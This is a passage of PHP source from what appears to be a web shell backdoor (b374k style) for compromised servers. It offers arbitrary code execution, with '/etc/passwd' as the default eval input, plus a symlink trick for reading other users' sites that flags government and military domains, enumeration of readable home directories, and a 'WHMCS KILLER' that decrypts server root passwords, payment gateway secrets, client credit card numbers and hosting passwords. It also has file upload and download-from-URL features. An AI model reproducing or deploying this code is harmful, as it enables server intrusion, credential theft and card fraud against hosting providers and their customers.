1300. header("Content-type: ".$s_inf["mime"]);
1301. header("Cache-control: public");
1302. header("Expires: ".@date("r",@mktime(0,0,0,1,1,2030)));
1303. header("Cache-control: max-age=".(60*60*24*7));#
1304. readfile($s_d.$s_f);
1305. exit;
1306. }
1307.  
1308. // rename file or folder
1309. if(isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])){
1310. $s_old = ss($_REQUEST['oldname']);
1311. $s_new = ss($_REQUEST['newname']);
1312.  
1313. $s_renmsg = "";
1314. if(is_dir($s_old)) $s_renmsg = (@rename($s_old,$s_new)) ? "Directory ".$s_old." renamed to ".$s_new : "Unable to rename directory ".$s_old." to ".$s_new;
1315. elseif(is_file($s_old)) $s_renmsg = (@rename($s_old,$s_new)) ? "File ".$s_old." renamed to ".$s_new : "Unable to rename file ".$s_old." to ".$s_new;
1316. else $s_renmsg = "Cannot find the path specified ".$s_old;
1317.  
1318. $s_result .= "<p class='notif'>".$s_renmsg."</p>";
1319. $s_fnew = $s_new;
1320. }
1321.  
1322. // confirm delete
1323. if(!empty($_REQUEST['del'])){
1324. $s_del = trim($_REQUEST['del']);
1325. $s_result .= "<p class='notif'>Delete ".basename($s_del)." ? <a href='".$s_self."delete=".$s_del."' onclick='return false;'>Yes</a> | <a href='".$s_self."' onclick='return false;'>No</a></p>";
1326. }// delete file
1327. elseif(!empty($_REQUEST['delete'])){
1328. $s_f = ss($_REQUEST['delete']);
1329. $s_delmsg = "";
1330. if(is_file($s_f)){
1331. $s_delmsg = (unlink($s_f)) ? "File removed : ".$s_f : "Unable to remove file ".$s_f;
1332. }
1333. elseif(is_dir($s_f)){
1334. rmdirs($s_f);
1335. $s_delmsg = (is_dir($s_f)) ? "Unable to remove directory ".$s_f : "Directory removed : ".$s_f;
1336. }
1337. else $s_delmsg = "Cannot find the path specified ".$s_f;
1338. $s_result .= "<p class='notif'>".$s_delmsg."</p>";
1339. } // create dir
1340. elseif(!empty($_REQUEST['mkdir'])){
1341. $s_f = ss($s_cwd.ss($_REQUEST['mkdir']));
1342. $s_dirmsg = "";
1343.  
1344. $s_num = 1;
1345. if(is_dir($s_f)){
1346. $s_pos = strrpos($s_f,"_");
1347. if($s_pos!==false) $s_num = (int) substr($s_f,$s_pos+1);
1348. while(is_dir(substr($s_f,0,$s_pos)."_".$s_num)){
1349. $s_num++;
1350. }
1351. $s_f = substr($s_f,0,$s_pos)."_".$s_num;
1352. }
1353. if(mkdir($s_f)) $s_dirmsg = "Directory created ".$s_f;
1354. else $s_dirmsg = "Unable to create directory ".$s_f;
1355.  
1356. $s_result .= "<p class='notif'>".$s_dirmsg."</p>";
1357. }
1358.  
1359. // php eval() function
1360. if(isset($_REQUEST['x']) && ($_REQUEST['x']=='eval')){
1361. $s_code = "";
1362. $s_res = "";
1363. $s_gccoption = "";
1364. $s_lang = "php";
1365.  
1366. if(isset($_REQUEST['evalcode'])){
1367. $s_code = ssc($_REQUEST['evalcode']);
1368. $s_gccoption = (isset($_REQUEST['gccoption']))? ssc($_REQUEST['gccoption']):"";
1369. $s_tmpdir = get_writabledir();
1370.  
1371. if(isset($_REQUEST['lang'])){$s_lang = $_REQUEST['lang'];}
1372.  
1373. if(strtolower($s_lang)=='php'){
1374. ob_start();
1375. eval($s_code);
1376. $s_res = ob_get_contents();
1377. ob_end_clean();
1378. }
1379. elseif(strtolower($s_lang)=='python'||strtolower($s_lang)=='perl'||strtolower($s_lang)=='ruby'||strtolower($s_lang)=='node'){
1380. $s_rand = md5(time().rand(0,100));
1381. $s_script = $s_tmpdir.$s_rand;
1382. file_put_contents($s_script, $s_code);
1383. if(is_file($s_script)){
1384. $s_res = exe($s_lang." ".$s_gccoption." ".$s_script);
1385. unlink($s_script);
1386. }
1387. }
1388. elseif(strtolower($s_lang)=='gcc'){
1389. $s_script = md5(time().rand(0,100));
1390. chdir($s_tmpdir);
1391. file_put_contents($s_script.".c", $s_code);
1392. if(is_file($s_script.".c")){
1393. $s_scriptout = $s_win ? $s_script.".exe" : $s_script;
1394. $s_res = exe("gcc ".$s_script.".c -o ".$s_scriptout.$s_gccoption);
1395. if(is_file($s_scriptout)){
1396. $s_res = $s_win ? exe($s_scriptout) : exe("chmod +x ".$s_scriptout." ; ./".$s_scriptout);
1397. rename($s_scriptout, $s_scriptout."del");
1398. unlink($s_scriptout."del");
1399. }
1400. unlink($s_script.".c");
1401. }
1402. chdir($s_cwd);
1403. }
1404. elseif(strtolower($s_lang)=='java'){
1405. if(preg_match("/class\ ([^{]+){/i",$s_code, $s_r)){
1406. $s_classname = trim($s_r[1]);
1407. $s_script = $s_classname;
1408. }
1409. else{
1410. $s_rand = "b374k_".substr(md5(time().rand(0,100)),0,8);
1411. $s_script = $s_rand;
1412. $s_code = "class ".$s_rand." { ".$s_code . " } ";
1413. }
1414. chdir($s_tmpdir);
1415. file_put_contents($s_script.".java", $s_code);
1416. if(is_file($s_script.".java")){
1417. $s_res = exe("javac ".$s_script.".java");
1418. if(is_file($s_script.".class")){
1419. $s_res .= exe("java ".$s_gccoption." ".$s_script);
1420. unlink($s_script.".class");
1421. }
1422. unlink($s_script.".java");
1423. }
1424. chdir($s_pwd);
1425. }
1426. }
1427.  
1428. $s_lang_available = "<option value='php'>php</option>";
1429. $s_selected = "";
1430. if($s_python){
1431. $s_checked = ($s_lang == "python") ? "selected" : "";
1432. $s_lang_available .= "<option value='python' ".$s_checked.">python</option>";
1433. }
1434. if($s_perl){
1435. $s_checked = ($s_lang == "perl") ? "selected" : "";
1436. $s_lang_available .= "<option value='perl' ".$s_checked.">perl</option>";
1437. }
1438. if($s_ruby){
1439. $s_checked = ($s_lang == "ruby") ? "selected" : "";
1440. $s_lang_available .= "<option value='ruby' ".$s_checked.">ruby</option>";
1441. }
1442. if($s_node){
1443. $s_checked = ($s_lang == "node") ? "selected" : "";
1444. $s_lang_available .= "<option value='node' ".$s_checked.">node</option>";
1445. }
1446. if($s_gcc){
1447. $s_checked = ($s_lang == "gcc") ? "selected" : "";
1448. $s_lang_available .= "<option value='gcc' ".$s_checked.">c</option>";
1449. }
1450. if($s_java){
1451. $s_checked = ($s_lang == "java") ? "selected" : "";
1452. $s_lang_available .= "<option value='java' ".$s_checked.">java</option>";
1453. }
1454. $s_gccoptionclass = ($s_lang=="php")? "sembunyi":"";
1455. $s_e_result = (!empty($s_res)) ? "<pre id='evalres' class='border-top' style='margin:4px 0 0 0;padding:6px 0;' >".hss($s_res)."</pre>":"";
1456. $s_result .= "<form action='".$s_self."' method='post'>
1457. <textarea id='evalcode' name='evalcode' style='height:150px;' class='txtarea'>".hss($s_code)." echo file_get_contents('/etc/passwd'); </textarea>
1458. <table><tr><td style='padding:0;'><p><input type='submit' name='evalcodesubmit' class='inputzbut' value='Go !' style='width:120px;height:30px;' /></p>
1459. </td><td><select name='lang' onchange='evalselect(this);' class='inputzbut' style='width:120px;height:30px;padding:4px;'>
1460. ".$s_lang_available."</select>
1461. </td>
1462. <td><div title='If you want to give additional option to interpreter or compiler, give it here' id='additionaloption' class='".$s_gccoptionclass."'>Additional option&nbsp;&nbsp;<input class='inputz' style='width:400px;' type='text' name='gccoption' value='".hss($s_gccoption)."' id='gccoption' /></div></td>
1463. </tr>
1464. </table>
1465. ".$s_e_result."
1466. <input type='hidden' name='x' value='eval' />
1467. </form>
1468. ";
1469. }
1470. // find
1471. elseif(isset($_REQUEST['find'])){
1472. $s_p = ss($_REQUEST['find']);
1473.  
1474. $s_type = isset($_REQUEST['type']) ? $_REQUEST['type'] : "sfile";
1475. $s_sfname = (!empty($_REQUEST['sfname']))?ssc($_REQUEST['sfname']):'';
1476. $s_sdname = (!empty($_REQUEST['sdname']))?ssc($_REQUEST['sdname']):'';
1477. $s_sfcontain = (!empty($_REQUEST['sfcontain']))?ssc($_REQUEST['sfcontain']):'';
1478.  
1479. $s_sfnameregexchecked=$s_sfnameicasechecked=$s_sdnameregexchecked=$s_sdnameicasechecked=$s_sfcontainregexchecked=$s_sfcontainicasechecked=$s_swritablechecked=$s_sreadablechecked=$s_sexecutablechecked="";
1480. $s_sfnameregex=$s_sfnameicase=$s_sdnameregex=$s_sdnameicase=$s_sfcontainregex=$s_sfcontainicase=$s_swritable=$s_sreadable=$s_sexecutable=false;
1481.  
1482. if(isset($_REQUEST['sfnameregex'])){$s_sfnameregex=true;$s_sfnameregexchecked="checked";}
1483. if(isset($_REQUEST['sfnameicase'])){$s_sfnameicase=true;$s_sfnameicasechecked="checked";}
1484. if(isset($_REQUEST['sdnameregex'])){$s_sdnameregex=true;$s_sdnameregexchecked="checked";}
1485. if(isset($_REQUEST['sdnameicase'])){$s_sdnameicase=true;$s_sdnameicasechecked="checked";}
1486. if(isset($_REQUEST['sfcontainregex'])){$s_sfcontainregex=true;$s_sfcontainregexchecked="checked";}
1487. if(isset($_REQUEST['sfcontainicase'])){$s_sfcontainicase=true;$s_sfcontainicasechecked="checked";}
1488. if(isset($_REQUEST['swritable'])){$s_swritable=true;$s_swritablechecked="checked";}
1489. if(isset($_REQUEST['sreadable'])){$s_sreadable=true;$s_sreadablechecked="checked";}
1490. if(isset($_REQUEST['sexecutable'])){$s_sexecutable=true;$s_sexecutablechecked="checked";}
1491.  
1492. $s_sexecb = (function_exists("is_executable")) ? "<input class='css-checkbox' type='checkbox' name='sexecutable' value='sexecutable' id='se' ".$s_sexecutablechecked." /><label class='css-label' for='se'>Executable</span>":"";
1493.  
1494. $s_candidate = array();
1495. if(isset($_REQUEST['sgo'])){
1496. $s_af = "";
1497.  
1498. $s_candidate = getallfiles($s_p);
1499. if($s_type=='sfile') $s_candidate = array_filter($s_candidate, "is_file");
1500. elseif($s_type=='sdir') $s_candidate = array_filter($s_candidate, "is_dir");
1501.  
1502. foreach($s_candidate as $s_a){
1503. if($s_type=='sdir'){
1504. if(!empty($s_sdname)){
1505. if($s_sdnameregex){
1506. if($s_sdnameicase){if(!preg_match("/".$s_sdname."/i", basename($s_a))) $s_candidate = array_diff($s_candidate,array($s_a));}
1507. else{if(!preg_match("/".$s_sdname."/", basename($s_a))) $s_candidate = array_diff($s_candidate,array($s_a));}
1508. }
1509. else{
1510. if($s_sdnameicase){if(strpos(strtolower(basename($s_a)),strtolower($s_sdname))===false) $s_candidate = array_diff($s_candidate,array($s_a));}
1511. else{if(strpos(basename($s_a),$s_sdname)===false) $s_candidate = array_diff($s_candidate,array($s_a));}
1512. }
1513. }
1514. }
1515. elseif($s_type=='sfile'){
1516. if(!empty($s_sfname)){
1517. if($s_sfnameregex){
1518. if($s_sfnameicase){if(!preg_match("/".$s_sfname."/i", basename($s_a))) $s_candidate = array_diff($s_candidate,array($s_a));}
1519. else{if(!preg_match("/".$s_sfname."/", basename($s_a))) $s_candidate = array_diff($s_candidate,array($s_a));}
1520. }
1521. else{
1522. if($s_sfnameicase){if(strpos(strtolower(basename($s_a)),strtolower($s_sfname))===false) $s_candidate = array_diff($s_candidate,array($s_a));}
1523. else{if(strpos(basename($s_a),$s_sfname)===false) $s_candidate = array_diff($s_candidate,array($s_a));}
1524. }
1525. }
1526. if(!empty($s_sfcontain)){
1527. $s_sffcontent = @file_get_contents($s_a);
1528. if($s_sfcontainregex){
1529. if($s_sfcontainicase){if(!preg_match("/".$s_sfcontain."/i", $s_sffcontent)) $s_candidate = array_diff($s_candidate,array($s_a));}
1530. else{if(!preg_match("/".$s_sfcontain."/", $s_sffcontent)) $s_candidate = array_diff($s_candidate,array($s_a));}
1531. }
1532. else{
1533. if($s_sfcontainicase){if(strpos(strtolower($s_sffcontent),strtolower($s_sfcontain))===false) $s_candidate = array_diff($s_candidate,array($s_a));}
1534. else{if(strpos($s_sffcontent,$s_sfcontain)===false) $s_candidate = array_diff($s_candidate,array($s_a));}
1535. }
1536. }
1537. }
1538. }
1539. }
1540.  
1541. $s_f_result = "";$s_link="";
1542. foreach($s_candidate as $s_c){
1543. $s_c=trim($s_c);
1544. if($s_swritable && !is_writable($s_c)) continue;
1545. if($s_sreadable && !is_readable($s_c)) continue;
1546. if($s_sexecutable && !is_executable($s_c)) continue;
1547. if($s_type=="sfile") $s_link = $s_self."view=".$s_c;
1548. elseif($s_type=="sdir") $s_link = $s_self."view=".cp($s_c);
1549. $s_f_result .= "<p class='notif' ondblclick=\"return go('".addslashes($s_link)."',event);\"><a href='".$s_link."' onclick='return false;'>".$s_c."</a></p>";
1550. }
1551.  
1552. $s_tsdir = ($s_type=="sdir")? "selected":"";
1553. $s_tsfile = ($s_type=="sfile")? "selected":"";
1554.  
1555. if(!is_dir($s_p)) $s_result .= "<p class='notif'>Cannot find the path specified ".$s_p."</p>";
1556. $s_result .= "<form action='".$s_self."' method='post'>
1557. <div class='mybox'><h2>Find</h2>
1558. <table class='myboxtbl'>
1559. <tr><td style='width:140px;'>Search in</td>
1560. <td colspan='2'><input style='width:100%;' value='".hss($s_p)."' class='inputz' type='text' name='find' /></td></tr>
1561. <tr onclick=\"findtype('sdir');\">
1562. <td>Dirname contains</td>
1563. <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sdname' value='".hss($s_sdname)."' /></td>
1564. <td>
1565. <input type='checkbox' class='css-checkbox' name='sdnameregex' id='sdn' ".$s_sdnameregexchecked." /><label class='css-label' for='sdn'>Regex (pcre)</label>
1566. <input type='checkbox' class='css-checkbox' name='sdnameicase' id='sdi' ".$s_sdnameicasechecked." /><label class='css-label' for='sdi'>Case Insensitive</label>
1567. </td>
1568. </tr>
1569. <tr onclick=\"findtype('sfile');\">
1570. <td>Filename contains</td>
1571. <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfname' value='".hss($s_sfname)."' /></td>
1572. <td>
1573. <input type='checkbox' class='css-checkbox' name='sfnameregex' id='sfn' ".$s_sfnameregexchecked." /><label class='css-label' for='sfn'>Regex (pcre)</label>
1574. <input type='checkbox' class='css-checkbox' name='sfnameicase' id='sfi' ".$s_sfnameicasechecked." /><label class='css-label' for='sfi'>Case Insensitive</label>
1575. </td>
1576. </tr>
1577. <tr onclick=\"findtype('sfile');\">
1578. <td>File contains</td>
1579. <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfcontain' value='".hss($s_sfcontain)."' /></td>
1580. <td>
1581. <input type='checkbox' class='css-checkbox' name='sfcontainregex' id='sff' ".$s_sfcontainregexchecked." /><label class='css-label' for='sff'>Regex (pcre)</label>
1582. <input type='checkbox' class='css-checkbox' name='sfcontainicase' id='sffi' ".$s_sfcontainicasechecked." /><label class='css-label' for='sffi'>Case Insensitive</label>
1583. </td>
1584. </tr>
1585. <tr>
1586. <td>Permissions</td>
1587. <td colspan='2'>
1588. <input type='checkbox' class='css-checkbox' name='swritable' id='sw' ".$s_swritablechecked." /><label class='css-label' for='sw'>Writable</label>
1589. <input type='checkbox' class='css-checkbox' name='sreadable' id='sr' ".$s_sreadablechecked." /><label class='css-label' for='sr'>Readable</label>
1590. ".$s_sexecb."
1591. </td>
1592. </tr>
1593. <tr><td>
1594. <input type='submit' name='sgo' class='inputzbut' value='Search !' style='width:120px;height:30px;margin:0;' />
1595. </td>
1596. <td>
1597. <select name='type' id='type' class='inputzbut' style='width:120px;height:30px;margin:0;padding:4px;'>
1598. <option value='sfile' ".$s_tsfile.">Search file</option>
1599. <option value='sdir' ".$s_tsdir.">Search dir</option>
1600. </select>
1601. </td>
1602. <td></td></tr>
1603. </table>
1604. </div>
1605. </form>
1606. <div>
1607. ".$s_f_result."
1608. </div>
1609. ";
1610. }
1611.  
1612. //////// SYMLINK //////////
1613.  
1614. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='symlink')){
1615. @set_time_limit(0);
1616. echo "<center>";
1617. @mkdir('DM',0777);
1618. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1619. $write =@fopen ('DM/.htaccess','w');
1620. fwrite($write ,$htaccess);
1621. @symlink('/','DM/dm.txt');
1622. $filelocation = basename(__FILE__);
1623. $read_named_conf = @file('/etc/named.conf');
1624. if(!$read_named_conf) {
1625. echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1626. } else {
1627. echo "<br><br>
1628. <div class='tmp'>
1629. <table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'>
1630. <td align='center'><b>_DOMAINS_</b></td>
1631. <td align='center'><b>_USERS_</b></td>
1632. <td align='center'><b>_SYMLINK_</b></td>";
1633. foreach($read_named_conf as $subject){
1634. if(eregi('zone',$subject)){
1635. preg_match_all('#zone "(.*)"#',$subject,$string);
1636. flush();
1637. if(strlen(trim($string[1][0])) >2){
1638. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
1639. $name = $UID['name'] ;
1640. @symlink('/','DM/dm.txt');
1641. $name = $string[1][0];
1642. $iran = '\.ir';
1643. $israel = '\.il';
1644. $indo = '\go.id';
1645. $sg = '\.sg';
1646. $edu = '\.edu';
1647. $gov = '\.gov';
1648. $gose = '\.go';
1649. $gober = '\.gob';
1650. $mil1 = '\.mil';
1651. $mil2 = '\.mi';
1652. $mm = '\.mm';
1653. $my = '\.my';
1654. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
1655. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
1656. {
1657. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
1658. }
1659. echo "<tr><td>
1660. <div class='dom'><center><a target='_blank' href=http://".$string[1][0].'/>'.$name.' </a></center></div></td>
1661. <td><center>'.$UID['name']."</center></td>
1662. <td><center><a href='DM/dm.txt/home/".$UID['name']."/public_html' target='_blank'>Symlink </a></center>
1663. </td></tr></div>";
1664. flush();
1665. }}}}
1666. echo "</center></table>";
1667. }
1668.  
1669. ////////// JUMPING READABLE //////////
1670. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='jumping')){
1671. @$passwd = fopen('/etc/passwd','r');
1672. if (!$passwd) {
1673. die('<b><center>[+] cant read /etc/passwd [+]</b></center>');
1674. }
1675. $pub = array();
1676. $users = array();
1677. $conf = array();
1678. $i = 0;
1679. while(!feof($passwd)){
1680. $str = fgets($passwd);
1681. if ($i > 10){
1682. $pos = strpos($str,':');
1683. $username = substr($str,0,$pos);
1684. $dirz = '/home/'.$username.'/public_html/';
1685. if (($username != '')){
1686. if (is_readable($dirz)){
1687. array_push($users,$username);
1688. array_push($pub,$dirz);
1689. }
1690. }
1691. }
1692. $i++;
1693. }
1694. echo '<br><br>';
1695. echo "<center><b>[+] KETEMU ".sizeof($pub)." MAHO"." [+]</b><br/><br/>";
1696. foreach ($users as $user)
1697. {
1698. $path = "/home/$user/public_html/";
1699. echo "<a href='?cd&#61;$path' target='_blank' style='font-weight:bold; color:#FFFFFF;'>$path</a><br>";
1700. }
1701. echo "<br>";
1702. echo '</center></body></html>';
1703. }
1704.  
1705. ////////// WHMCS KILLER //////////
1706.  
1707. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='whmcs')){
1708. $s_result = " ";
1709. $s_msg = "";
1710. $perawan = $_POST['anu1'];
1711. $kimcil = $_POST['anu2'];
1712. $janda = $_POST['anu3'];
1713. $hotel = $_POST['anu4'];
1714. $kondom = $_POST['anu5'];
1715.  
1716. @mysql_connect($perawan,$kimcil,$janda);
1717. @mysql_select_db($hotel);
1718. $cc_encryption_hash = $kondom;
1719.  
1720. function dec($string,$cc_encryption_hash){
1721. $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
1722. $hash_key = _hash($key);
1723.  
1724. $hash_length = strlen($hash_key);
1725. $string = base64_decode($string);
1726. $tmp_iv = substr($string,0,$hash_length);
1727. $string = substr($string,$hash_length,strlen ($string) - $hash_length);
1728. $iv = $out = '';
1729. $c = 0;
1730. while ($c < $hash_length){
1731. $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
1732. ++$c;
1733. }
1734.  
1735. $key = $iv;
1736. $c = 0;
1737. while ($c < strlen($string)){
1738. if (($c != 0 AND $c % $hash_length == 0)){
1739.  
1740. $key = _hash($key . substr($out,$c - $hash_length,$hash_length));
1741. }
1742. $out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
1743. ++$c;
1744. }
1745. return $out;
1746. }
1747. function _hash($string)
1748. {
1749. $hash = (function_exists('sha1')) ? sha1($string):md5($string);
1750. $out = '';
1751. $c = 0;
1752.  
1753. while ($c < strlen($hash)){
1754. $out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
1755. $c += 2;
1756. }
1757. return $out;
1758. }
1759.  
1760.  
1761. if(isset($_POST['plapon'])) {
1762. $query = mysql_query("SELECT *FROM tblservers");
1763. echo "<hr><br/><center>
1764. <font color='lime' size='7'><b><u>Host Root</b></u></font></center><br/>
1765. <table border='1' cellpadding='5' align='center'>
1766. <tr> <td align='center'><b> <font color='lime'> TYPE</font></b></td>
1767. <td align='center'><b> <font color='lime'> ACTIVE </font></b></td>
1768. <td align='center'><b> <font color='lime'> IP ADDRESS</font></b></td>
1769. <td align='center'><b> <font color='lime'> USERNAME</font></b></td>
1770. <td align='center'><b> <font color='lime'> PASSWORD</font></b></td>
1771. <td align='center'><b> <font color='lime'>ACCESS HASH</font></b></td>
1772. <td align='center'><b> <font color='lime'>NAME SERVER</font></b>
1773. </tr>";
1774.  
1775. while($v = mysql_fetch_array($query)) {
1776. echo "<tr>
1777. <td align='center'> <font color='white'> {$v['type']}</font></td>
1778. <td align='center'> <font color='white'> {$v['active']}</font></td>
1779. <td align='center'> <font color='white'> {$v['ipaddress']}</font></td>
1780. <td> <font color='white'> {$v['username']}</font></td>
1781. <td> <font color='white'> ".dec($v['password'],$cc_encryption_hash)."</font></td>
1782. <td> <font color='white'> {$v['accesshash']}</font></td>
1783. <td> <font color='white'> {$v['nameserver1']}</font></td>
1784. </tr>";
1785. }
1786. echo "</table>";
1787.  
1788. $query = mysql_query("SELECT *FROM tblregistrars");
1789. echo "<center><font color='lime' size='7'><b><u>Domain Registrars</u></b></font></center><br/>
1790. <table border='1' align='center' cellpadding='5'>
1791. <tr> <td align='center'><b> <font color='lime'> REGISTRAR</font></b></td>
1792. <td align='center'><b> <font color='lime'> SETTING</font></b></td>
1793. <td align='center'><b> <font color='lime'> VALUE</font> </b></td></tr>";
1794. while($v = mysql_fetch_array($query)){
1795. $value = (!dec($v['value'],$cc_encryption_hash)) ? "0":dec($v['value'],$cc_encryption_hash);
1796. echo "<tr>
1797. <td align='center'> <font color='white'> {$v['registrar']}</font></td>
1798. <td align='center'> <font color='white'> {$v['setting']}</font></td>
1799. <td align='center'> <font color='white'> $value</font></td></tr>" ;
1800. }
1801. echo "</table>";
1802.  
1803. $query = mysql_query("SELECT *FROM tblpaymentgateways");
1804. echo "<center><font color='lime' size='7'><b><u>Payment Gateway</u></b></font></center><br/> <table border='1' align='center' cellpadding='5'>
1805. <tr> <td align='center'><b> <font color='lime'> GATEWAY</font></b></td>
1806. <td align='center'><b> <font color='lime'> SETTING </font></b></td>
1807. <td align='center'><b> <font color='lime'> VALUE </font></b></td>
1808. <td align='center'><b> <font color='lime'> ORDER </font></b></td></tr>";
1809. while($v = mysql_fetch_array($query)){
1810. echo "<tr>
1811. <td align='center'> <font color='white'> {$v['gateway']}</font></td>
1812. <td align='center'> <font color='white'> {$v['setting']}</font></td>
1813. <td align='center'> <font color='white'> {$v['value']}</font></td>
1814. <td align='center'> <font color='white'> {$v['order']}</font></td> </tr>" ;
1815. }
1816. echo "</table>";
1817. $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
1818.  
1819. echo "<hr><br/><center><font color='lime' size='7'><b><u>Cilent CC</b></u></font></center><br/> <table border='1' cellpadding='5' align='center'>
1820. <tr><td align='center'><b> <font color='lime'>CardType</font></b></td>
1821. <td align='center'><b><font color='lime'>CardNumb </font></b></td>
1822. <td align='center'><b> <font color='lime'>Expdate</font></b></td>
1823. <td align='center'><b> <font color='lime'>IssueNumber</font></b></td>
1824. <td align='center'><b> <font color='lime'>FirstName</font></b></td>
1825. <td align='center'><b> <font color='lime'>LastName</font></b></td>
1826. <td align='center'><b><font color='lime'>Address</font></b></td>
1827. <td align='center'><b> <font color='lime'>Country</font></b></td>
1828. <td align='center'><b> <font color='lime'>Phone</font></b></td>
1829. <td align='center'><b> <font color='lime'>Email</font></b></td>
1830. </tr>";
1831.  
1832. while($v = mysql_fetch_array($query)) {
1833. $cchash = md5($cc_encryption_hash.$v['0']);
1834.  
1835. $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='".$v['0']."'");
1836.  
1837. $v2=mysql_fetch_array($s);
1838.  
1839. echo "<tr>
1840. <td align='center'> <font color='white'> ".$v2['cardtype']."</font></td>
1841. <td align='center'> <font color='white'> ".$v2['cardnum']." </font> </td>
1842. <td align='center'> <font color='white'> ".$v2['expdate']." </font> </td>
1843. <td align='center'> <font color='white'> ".$v2['issuenumber']." </font> </td>
1844. <td align='center'> <font color='white'> ".$v2['firstname']." </font> </td>
1845. <td align='center'> <font color='white'> ".$v2['lastname']." </font> </td>
1846. <td align='center'> <font color='white'> ".$v2['address1']." </font> </td>
1847. <td align='center'> <font color='white'> ".$v2['country']." </font> </td>
1848. <td align='center'> <font color='white'> ".$v2['phonenumber']." </font> </td>
1849. <td align='center'> <font color='white'> ".$v2['email']." </font> </td></tr>";
1850. }
1851. echo "</table>";
1852.  
1853.  
1854.  
1855. $query = mysql_query("SELECT *FROM tblhosting");
1856. echo "<center><font color='lime' size='7'><b><u>Clients Hosting Account</u></b></font></center><br/><table border='1' cellpadding='5' align='center'>
1857. <tr><td align='center'><b> <font color='lime'> DOMAIN</font></b></td>
1858. <td align='center'><b> <font color='lime'> USERNAME</font></b></td>
1859. <td align='center'><b> <font color='lime'> PASSWORD</font></b></td>
1860. <td align='center'><b> <font color='lime'> IP ADDRESS</font></b></td></tr>";
1861. while($v = mysql_fetch_array($query)){
1862. echo "<tr>
1863. <td align='center'> <font color='white'> {$v['domain']}</font></td>
1864. <td align='center'> <font color='white'> {$v['username']}</font></td>
1865. <td align='center'> <font color='white'> ".dec($v['password'],$cc_encryption_hash)."</font></td>
1866. <td align='center'> <font color='white'> {$v['assignedips']}</font></td></tr>";
1867. }
1868. echo "</table>";
1869. }
1870.  
1871. if(!empty($s_msg)) $s_result .= $s_msg;
1872. $s_result .= "<p><br/><body><center>
1873. <h1>[+] WHMCS KILLER [+] </h1>
1874. <h1>THANKS TO RAB3OUN</h1>
1875. <p><form action='".$s_self."' method='post'>
1876. <table border=1>
1877. <tr><td>db_host </td>
1878. <td><input type='text' style='color:#FF0000;background-color:#000000' size='60' name='anu1' value='localhost'></td></tr>
1879. <tr><td>db_username </td>
1880. <td><input type='text' style='color:#FF0000;background-color:#000000' size='60' name='anu2'></td></tr>
1881. <tr><td>db_password</td>
1882. <td><input type='text' style='color:#FF0000;background-color:#000000' size='60' name='anu3'></td></tr>
1883. <tr><td>db_name</td>
1884. <td><input type='text' style='color:#FF0000;background-color:#000000' size='60' name='anu4'></td></tr>
1885. <tr><td>cc_encryption_hash</td>
1886. <td><input style='color:#FF0000;background-color:#000000' type='text' size='60' name='anu5'></td></tr>
1887. </table><br>
1888. <INPUT class=submit type='submit' style='color:#FF0000;background-color:#000000' value=' HAJAR BOS ' name='plapon'>
1889. </FORM></center>";
1890.  
1891. }
1892. //// UPLOADFILE /////
1893.  
1894. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='upload')){
1895. $s_result = " ";
1896. $s_msg = "";
1897. if(isset($_REQUEST['uploadhd'])){
1898. $s_fn = $_FILES['filepath']['name'];
1899. if(is_uploaded_file($_FILES['filepath']['tmp_name'])){
1900. $s_p = cp(ss($_REQUEST['savefolder']));
1901. if(!is_dir($s_p)) mkdir($s_p);
1902. if(isset($_REQUEST['savefilename']) && (trim($_REQUEST['savefilename'])!="")) $s_fn = ss($_REQUEST['savefilename']);
1903. $s_tm = $_FILES['filepath']['tmp_name'];
1904. $s_pi = cp($s_p).$s_fn;
1905. $s_st = @move_uploaded_file($s_tm,$s_pi);
1906. if($s_st)
1907. $s_msg = "<p class='notif'>File uploaded to <a href='".$s_self."view=".$s_pi."' onclick='return false;'>".$s_pi."</a></p>";
1908. else $s_msg = "<p class='notif'>Failed to upload ".$s_fn."</p>";
1909. }
1910. else $s_msg = "<p class='notif'>Failed to upload ".$s_fn."</p>";
1911. }
1912.  
1913. elseif(isset($_REQUEST['uploadurl'])){
1914. // function dlfile($s_url,$s_fpath){
1915. $s_p = cp(ss($_REQUEST['savefolderurl']));
1916. if(!is_dir($s_p)) mkdir($s_p);
1917. $s_fu = ss($_REQUEST['fileurl']);
1918. $s_fn = basename($s_fu);
1919. if(isset($_REQUEST['savefilenameurl']) && (trim($_REQUEST['savefilenameurl'])!="")) $s_fn = ss($_REQUEST['savefilenameurl']);
1920. $s_fp = cp($s_p).$s_fn;
1921. $s_st = dlfile($s_fu,$s_fp);
1922. if($s_st) $s_msg = "<p class='notif'>File uploaded to <a href='".$s_self."view=".$s_fp."' onclick='return false;'>".$s_fp."</a></p>";
1923. else $s_msg = "<p class='notif'>Failed to upload ".$s_fn."</p>";
